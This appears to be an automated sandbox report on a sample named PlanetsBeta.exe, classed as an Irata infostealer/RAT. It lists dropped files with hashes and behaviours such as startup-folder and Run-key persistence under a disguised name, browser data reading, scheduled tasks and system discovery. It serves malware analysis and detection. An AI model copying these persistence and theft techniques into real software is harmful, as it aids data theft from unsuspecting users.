SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\swiftshader\libGLESv2.dll

MD5 6011f5f450b656d77d41ea3f9f15ea3a
SHA1 8db4bdadf809076707a8ed9c567d7c3ad60221a9
SHA256 c2541c590659ab045e565f240abdbb62d73e1efa7f990cc7ca47917e992a16aa
SHA512 10d28c968dfffa74a5b28d52a27cbd7f0c6774d115bec98474362196eb0a826edeb623eefe511c4402536cefb4d81649ab79cb9f2fe0b01b6279b2f078c81b96

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\swiftshader\libEGL.dll

MD5 29f1ffe7ec60ad99f19ac56e024a1b75
SHA1 8d0f6509584d18a7c63d4ede25ae84e1c6ef8f81
SHA256 babe81cbe12f7156be6a656e083cf1eb16f20e5f594173671585f67f0dd2e53e
SHA512 6f95116063a2696039c49980c83e429a9e82f9146da00e4591664fd0f44780b07a002b98c74f07bafb87884a760a02d23a958ee3c2f8435211c981259c4c2801

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 9b743afda68f16a2449782338dce5ce8
SHA1 72a71b5a9546ca035a2db2ce3479b6a7d4e93ec1
SHA256 983c843c075696ef1dbfe5d1a0e580b39c9cb84813f243b647adbe530aee7207
SHA512 ca390e6d2e3ed8981019fd21321d3e32a4787ec81d847ceff2b15c83752f94835f0dbd2175cf48dcb34739da42ec91c7f49fda2d6517f21778932d43eb62cc3a

\Users\Admin\AppData\Local\Temp\nso58DB.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\ffmpeg.dll

MD5 20594ad2f8497f4bb47d4caad7f587ed
SHA1 f9c139d2165444a46cf7127afa00c53364290cc9
SHA256 29813a6e731388982798fd5f9bb4a38b4019c75e1f728bb641a8999e1df06830
SHA512 593567cd8053167320b326fda8d4e1d595e2f8234fcc9fc2fdd0bf322d5d941139457fe2abb7aebf18f88f7a72723c07965416c1343f567e9d489c92ef5ba914

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\ffmpeg.dll

MD5 633fd86dd50d1b13c2273b4231a7ee98
SHA1 cf71e5a181a1f3a967203c5d06d939e04a3d762e
SHA256 06a237ab8c03c52519690f32c3c61e9f9d63855e9f1856541fde9a80e662b8f4
SHA512 1cef5309bd17e95a7cb5a70f9617be43faa8228954cd89f4c87991c648bef89d9f55332026144320cda9489bd2cb94805cd1c2909c7a0a8f495fa1e985c21468

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

MD5 23c715899822b93055215405d4dd4f25
SHA1 aa17fbb9745f9f83350bfa9a7ee2ca9bd42c3a94
SHA256 108559cee867698380c6bbda4c8ec5073bbdc48ee38b94b3a8a075ce0790ef41
SHA512 953371ca2b5a30a7bc250a667f0b4e4b7c19734fcb1aeac0b93c2f978c01c35e1bdaafee1d19e6101cc8b115e6ca0664105eb0f52d220ed6b8fbca600dc87101

\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

MD5 79db203f0bbbda8b592c3b9de038cf09
SHA1 16ce5d088cde497d9852cc55025a237b81b116cf
SHA256 a8c6997068c70bc2f44474cd5b4585791362c55f470e84b053609ecf456ad156
SHA512 cf70e64a1d2a00ee780a03bc286580e81efbd0c14a2d0278e8622b10e6129e73deadd2496cda277eda4b9f3b57ac90061c33f03b5b3edf2cf59dbc4a2ff617e7

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\icudtl.dat

MD5 b95e45dbbe6649909da5024ad7dd940b
SHA1 33025d2d7c39a194b5206a2946aa637755963f56
SHA256 5b8eab76295a851287cf38e4442424f8330f26ef749a864fb922a3b8b59ec92c
SHA512 dfabfaae542ee8f0c7df1a365c390ebf7740d8299874066fceab8fe1bb52bdc254f198e5406c3144b0217b5efb65046969628e33990d3521e4e743bcd3c3c2b1

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\v8_context_snapshot.bin

MD5 f699d63cb77123b7b1661d53b7ecf796
SHA1 532d9fa8b1332ed2d67c7291896a33a39037f938
SHA256 ed09cdc5d982b75fdbe7a73811b57804a78bf4107e72b834a8af40a1d9ed3178
SHA512 8cc4f71e6f07218db63ad5f3c5cc5338f0ec793fd61665d04c6aaf84e28079ead93d0eb372481a0e22aa40a9f094150f94e53f1fac5c7316758ef35955c71168

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\resources\app.asar

MD5 5cd174d6ca175116514140c8e9ad4467
SHA1 d52bd279046e2b11a1e4dec82a50158500790cc2
SHA256 b6967f0a028f0a5cb83b7e6f4333c5b5f2f26f4f8c04ecc98af73d5919b7de71
SHA512 38ece76c6a0d56bc74727dfd1358d3f4037f59290f53854982587c46f301ae3cd4ec3066347be4b551e0c92465996991334ddf996d4c232c1b6308a35dc98273

\Users\Admin\AppData\Local\Temp\9a63c4eb-203f-40f0-9c5d-2cb8501f1652.tmp.node

MD5 47ce40f157cd17de35bcba8be00c47ec
SHA1 fce550dcdef074cb5c0e80d837979907e2bb76cc
SHA256 84990d481d247f20fd155c1c9eb369c096ecaf0f8255668f0a07135337b52b9c
SHA512 166e49ee4d04907d56fd734b8714bbb5d6662895fa9bb9aa46224c061cafc4485f577e956f42f0d10e1c4ab20ec7a9a609e67be25a9e8e2c8c4d68952daf89e3

\Users\Admin\AppData\Local\Temp\7804f723-7b2d-435f-8f71-76b67bf92ff2.tmp.node

MD5 dd007baf84ae5fbdf1ffd044503c4be2
SHA1 d9a58e1b7becd64e487e8d1c0097957b14544f7e
SHA256 e609cc9754b1098c708b6508f1731b6d0782d781c8e2339aa1e298b8ee4123b3
SHA512 a4a3f937ce54a1ba73a00a6084ae3b45976ed4a85e49dc59a5e3053f6397fad11c371509ffe70f01cf6516d0489b3fe75fc3023bedf63e4b0c25beb03b669880

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\chrome_200_percent.pak

MD5 4d9ffc55015b32a9e3a66a673a01dc7e
SHA1 6fc4f87a9e6ebdd5af8a04a2e23089a342c96542
SHA256 ec91e47747756b381efde94112aba9aec14fd1314f84f08e637e578f8f325dd5
SHA512 a472a7e991b13689cc001f07d560587fa6ebff472dc227aead7d93c3a0af7b2e8649f858c1bd552b2f59f02071ba8c0d95b2eb2d616247d3a0f40677b6380e51

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\resources.pak

MD5 23b129dae608f08d563e5987a8ec578e
SHA1 8b6ee215c6319403bf30fb63973ee5c0b48b2641
SHA256 1be90bbb70013c472fb0d1f80e73223f39a63a167d16261955ba8218fcfa80ba
SHA512 e8f2a2c6df9ed2e944143799eee99fcaaf17834440f8d5dac556197e975706b469139b3894cb2accdf31953103e2a3a7f2df97c4bb95b0fb3e1f25d1eeb5352b

memory/2128-580-0x0000000000060000-0x0000000000061000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2984-615-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

memory/2984-616-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2984-617-0x000007FEF4AC0000-0x000007FEF545D000-memory.dmp

memory/2984-618-0x0000000001E90000-0x0000000001F10000-memory.dmp

memory/2984-619-0x0000000001E90000-0x0000000001F10000-memory.dmp

memory/2984-620-0x0000000001E90000-0x0000000001F10000-memory.dmp

memory/2984-621-0x000007FEF4AC0000-0x000007FEF545D000-memory.dmp

memory/2984-622-0x0000000001E90000-0x0000000001F10000-memory.dmp

memory/2984-625-0x000007FEF4AC0000-0x000007FEF545D000-memory.dmp

memory/2984-626-0x0000000001E90000-0x0000000001F10000-memory.dmp

memory/2984-627-0x0000000001E90000-0x0000000001F10000-memory.dmp

memory/2984-628-0x0000000001E90000-0x0000000001F10000-memory.dmp

memory/2984-629-0x0000000001E90000-0x0000000001F10000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 18:11

Reported

2023-12-18 18:14

Platform

win10v2004-20231215-en

Max time kernel

128s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupdy7TVh = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\PlanetsBeta.exe" C:\Windows\System32\Conhost.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2604 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 2604 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 3128 wrote to memory of 1268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3128 wrote to memory of 1268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 212 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
